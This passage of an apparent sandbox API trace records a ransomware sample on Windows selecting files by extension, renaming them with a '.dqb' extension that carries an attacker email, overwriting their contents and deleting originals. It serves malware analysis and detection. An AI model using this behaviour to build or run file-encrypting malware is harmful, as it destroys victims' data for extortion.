returned 4 [0060.196] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0060.196] lstrlenW (lpString=".xls") returned 4 [0060.196] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0060.196] lstrlenW (lpString=".xlsx") returned 5 [0060.196] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0060.196] lstrlenW (lpString=".ppt") returned 4 [0060.196] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0060.196] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0060.196] lstrlenW (lpString=".zip") returned 4 [0060.197] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0060.197] lstrlenW (lpString=".rar") returned 4 [0060.197] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0060.197] lstrlenW (lpString=".bz2") returned 4 [0060.197] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0060.197] lstrlenW (lpString=".7z") returned 3 [0060.197] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0060.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0060.197] lstrlenW (lpString=".dbf") returned 4 [0060.197] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0060.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0060.197] lstrlenW (lpString=".1cd") returned 4 [0060.197] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0060.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0060.197] lstrlenW (lpString=".jpg") returned 4 [0060.197] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0060.197] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0060.197] lstrlenW (lpString="Csi.dll") returned 7 [0060.197] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0060.566] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=5072816) returned 1 [0060.566] CloseHandle (hObject=0x230) returned 1 [0060.566] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll")) returned 0x20 [0060.566] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0060.566] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0060.567] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0060.567] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0x0) returned 1 [0060.567] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0060.567] ReadFile (in: hFile=0x230, lpBuffer=0x3650058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3650058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0061.556] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x19cd3a, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0061.558] ReadFile (in: hFile=0x230, lpBuffer=0x3690058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3690058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0061.568] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0061.568] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x4967b0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0061.568] ReadFile (in: hFile=0x230, lpBuffer=0x36d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x36d0058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0061.673] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.673] WriteFile (in: hFile=0x230, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xc00fa, lpNumberOfBytesWritten=0x2b3fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fcb0*=0xc00fa, lpOverlapped=0x0) returned 1 [0061.698] SetEndOfFile (hFile=0x230) returned 1 [0061.698] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x39006c0 [0061.698] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0061.698] WriteFile (in: hFile=0x230, lpBuffer=0x39006c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x39006c0*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0061.699] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x19cd3a, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0061.699] WriteFile (in: hFile=0x230, lpBuffer=0x39006c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x39006c0*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0061.701] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x4967b0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0061.701] WriteFile (in: hFile=0x230, lpBuffer=0x39006c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x39006c0*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0061.704] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39006c0 | out: hHeap=0x570000) returned 1 [0061.704] CloseHandle (hObject=0x230) returned 1 [0061.704] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0061.704] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0061.704] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0061.704] lstrlenW (lpString=".doc") returned 4 [0061.704] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0061.704] lstrlenW (lpString=".docx") returned 5 [0061.704] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0061.704] lstrlenW (lpString=".pdf") returned 4 [0061.704] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0061.704] lstrlenW (lpString=".xls") returned 4 [0061.704] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0061.704] lstrlenW (lpString=".xlsx") returned 5 [0061.704] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0061.704] lstrlenW (lpString=".ppt") returned 4 [0061.704] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0061.704] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0061.704] lstrlenW (lpString=".zip") returned 4 [0061.704] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0061.704] lstrlenW (lpString=".rar") returned 4 [0061.704] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0061.704] lstrlenW (lpString=".bz2") returned 4 [0061.704] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0061.704] lstrlenW (lpString=".7z") returned 3 [0061.705] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0061.705] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0061.705] lstrlenW (lpString=".dbf") returned 4 [0061.705] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0061.705] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0061.705] lstrlenW (lpString=".1cd") returned 4 [0061.705] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0061.705] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0061.705] lstrlenW (lpString=".jpg") returned 4 [0061.705] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0061.705] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0061.705] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0061.705] lstrlenW (lpString=".doc") returned 4 [0061.705] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0061.705] lstrlenW (lpString=".docx") returned 5 [0061.705] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0061.705] lstrlenW (lpString=".pdf") returned 4 [0061.705] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0061.705] lstrlenW (lpString=".xls") returned 4 [0061.705] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0061.705] lstrlenW (lpString=".xlsx") returned 5 [0061.705] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0061.705] lstrlenW (lpString=".ppt") returned 4 [0061.705] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0061.705] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0061.705] lstrlenW (lpString=".zip") returned 4 [0061.797] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0061.797] lstrlenW (lpString=".rar") returned 4 [0061.797] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0061.797] lstrlenW (lpString=".bz2") returned 4 [0061.797] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0061.797] lstrlenW (lpString=".7z") returned 3 [0061.797] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0061.797] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0061.797] lstrlenW (lpString=".dbf") returned 4 [0061.797] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0061.797] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0061.797] lstrlenW (lpString=".1cd") returned 4 [0061.797] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0061.797] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0061.797] lstrlenW (lpString=".jpg") returned 4 [0061.797] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0061.798] lstrcmpiW (lpString1=".EXE", lpString2=".dqb") returned 1 [0061.798] lstrlenW (lpString="FLTLDR.EXE") returned 10 [0061.798] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\fltldr.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 11 os_tid = 0xac8 [0032.343] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10000) returned 0x630750 [0032.343] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10000) returned 0x640758 [0032.343] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c02d0 [0032.344] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6) returned 0x5c3090 [0032.344] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c02e8 [0032.344] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x100000) returned 0x3760020 [0032.344] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0300 [0032.344] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c0300, Size=0x20) returned 0x5a5ca0 [0032.344] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0300 [0032.344] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c0300, Size=0x20) returned 0x5a5c78 [0032.344] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.344] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.344] Wow64DisableWow64FsRedirection (in: OldValue=0x2c7ff58 | out: OldValue=0x2c7ff58*=0x0) returned 1 [0032.344] lstrlenW (lpString="kernel32.dll") returned 12 [0032.344] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5ca0 | out: hHeap=0x570000) returned 1 [0032.344] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.344] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5c78 | out: hHeap=0x570000) returned 1 [0032.344] Sleep (dwMilliseconds=0x64) [0032.618] Sleep (dwMilliseconds=0x64) [0032.903] lstrcmpiW (lpString1=".ini", lpString2=".dqb") returned 1 [0032.903] lstrlenW (lpString="desktop.ini") returned 11 [0032.903] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0032.903] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=129) returned 1 [0032.903] CloseHandle (hObject=0x174) returned 1 [0032.903] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 0x26 [0032.903] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.904] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0032.904] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0032.904] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0032.904] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0032.904] GetLastError () returned 0x0 [0032.904] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x81, lpOverlapped=0x0) returned 1 [0032.916] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x90, lpOverlapped=0x0) returned 1 [0032.917] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0032.917] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xea, lpOverlapped=0x0) returned 1 [0032.917] SetEndOfFile (hFile=0x178) returned 1 [0032.917] CloseHandle (hObject=0x178) returned 1 [0032.918] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0032.918] SetEndOfFile (hFile=0x174) returned 1 [0032.919] CloseHandle (hObject=0x174) returned 1 [0032.919] SetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x26) returned 1 [0032.919] DeleteFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 1 [0032.920] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0032.920] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0032.920] lstrlenW (lpString=".doc") returned 4 [0032.920] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0032.920] lstrlenW (lpString=".docx") returned 5 [0032.920] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0032.920] lstrlenW (lpString=".pdf") returned 4 [0032.920] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0032.920] lstrlenW (lpString=".xls") returned 4 [0032.920] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0032.920] lstrlenW (lpString=".xlsx") returned 5 [0032.920] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0032.920] lstrlenW (lpString=".ppt") returned 4 [0032.920] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0032.920] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0032.920] lstrlenW (lpString=".zip") returned 4 [0032.920] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0032.920] lstrlenW (lpString=".rar") returned 4 [0032.920] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0032.920] lstrlenW (lpString=".bz2") returned 4 [0032.920] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0032.920] lstrlenW (lpString=".7z") returned 3 [0032.920] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0032.920] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0032.920] lstrlenW (lpString=".dbf") returned 4 [0032.920] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0032.920] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0032.920] lstrlenW (lpString=".1cd") returned 4 [0032.920] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0032.920] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0032.920] lstrlenW (lpString=".jpg") returned 4 [0032.920] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0032.921] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0032.921] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0032.921] lstrlenW (lpString=".doc") returned 4 [0032.921] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0032.921] lstrlenW (lpString=".docx") returned 5 [0032.921] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0032.921] lstrlenW (lpString=".pdf") returned 4 [0032.921] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0032.921] lstrlenW (lpString=".xls") returned 4 [0032.921] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0032.921] lstrlenW (lpString=".xlsx") returned 5 [0032.921] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0032.921] lstrlenW (lpString=".ppt") returned 4 [0032.921] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0032.921] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0032.921] lstrlenW (lpString=".zip") returned 4 [0032.921] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0032.921] lstrlenW (lpString=".rar") returned 4 [0032.921] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0032.921] lstrlenW (lpString=".bz2") returned 4 [0032.921] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0032.921] lstrlenW (lpString=".7z") returned 3 [0032.921] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0032.921] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0032.921] lstrlenW (lpString=".dbf") returned 4 [0032.921] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0032.921] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0032.921] lstrlenW (lpString=".1cd") returned 4 [0032.921] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0032.921] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0032.921] lstrlenW (lpString=".jpg") returned 4 [0032.921] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0032.922] lstrcmpiW (lpString1=".LOG", lpString2=".dqb") returned 1 [0032.922] lstrlenW (lpString="BCD.LOG") returned 7 [0032.922] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.922] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0032.922] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0032.922] lstrlenW (lpString=".doc") returned 4 [0032.922] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0032.922] lstrlenW (lpString=".docx") returned 5 [0032.922] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0032.922] lstrlenW (lpString=".pdf") returned 4 [0032.922] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0032.922] lstrlenW (lpString=".xls") returned 4 [0032.922] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0032.922] lstrlenW (lpString=".xlsx") returned 5 [0032.922] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0032.922] lstrlenW (lpString=".ppt") returned 4 [0032.922] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0032.922] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0032.922] lstrlenW (lpString=".zip") returned 4 [0032.922] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0032.922] lstrlenW (lpString=".rar") returned 4 [0032.922] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0032.922] lstrlenW (lpString=".bz2") returned 4 [0032.922] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0032.922] lstrlenW (lpString=".7z") returned 3 [0032.922] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0032.922] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0032.922] lstrlenW (lpString=".dbf") returned 4 [0032.922] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0032.922] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0032.922] lstrlenW (lpString=".1cd") returned 4 [0032.922] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0032.922] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0032.922] lstrlenW (lpString=".jpg") returned 4 [0032.923] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0032.923] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0032.923] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0032.923] lstrlenW (lpString=".doc") returned 4 [0032.923] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0032.923] lstrlenW (lpString=".docx") returned 5 [0032.923] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0032.923] lstrlenW (lpString=".pdf") returned 4 [0032.923] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0032.923] lstrlenW (lpString=".xls") returned 4 [0032.923] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0032.923] lstrlenW (lpString=".xlsx") returned 5 [0032.923] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0032.923] lstrlenW (lpString=".ppt") returned 4 [0032.923] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0032.923] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0032.923] lstrlenW (lpString=".zip") returned 4 [0032.923] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0032.923] lstrlenW (lpString=".rar") returned 4 [0032.923] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0032.923] lstrlenW (lpString=".bz2") returned 4 [0032.923] lstrcmpiW (lpString1=".bz2", 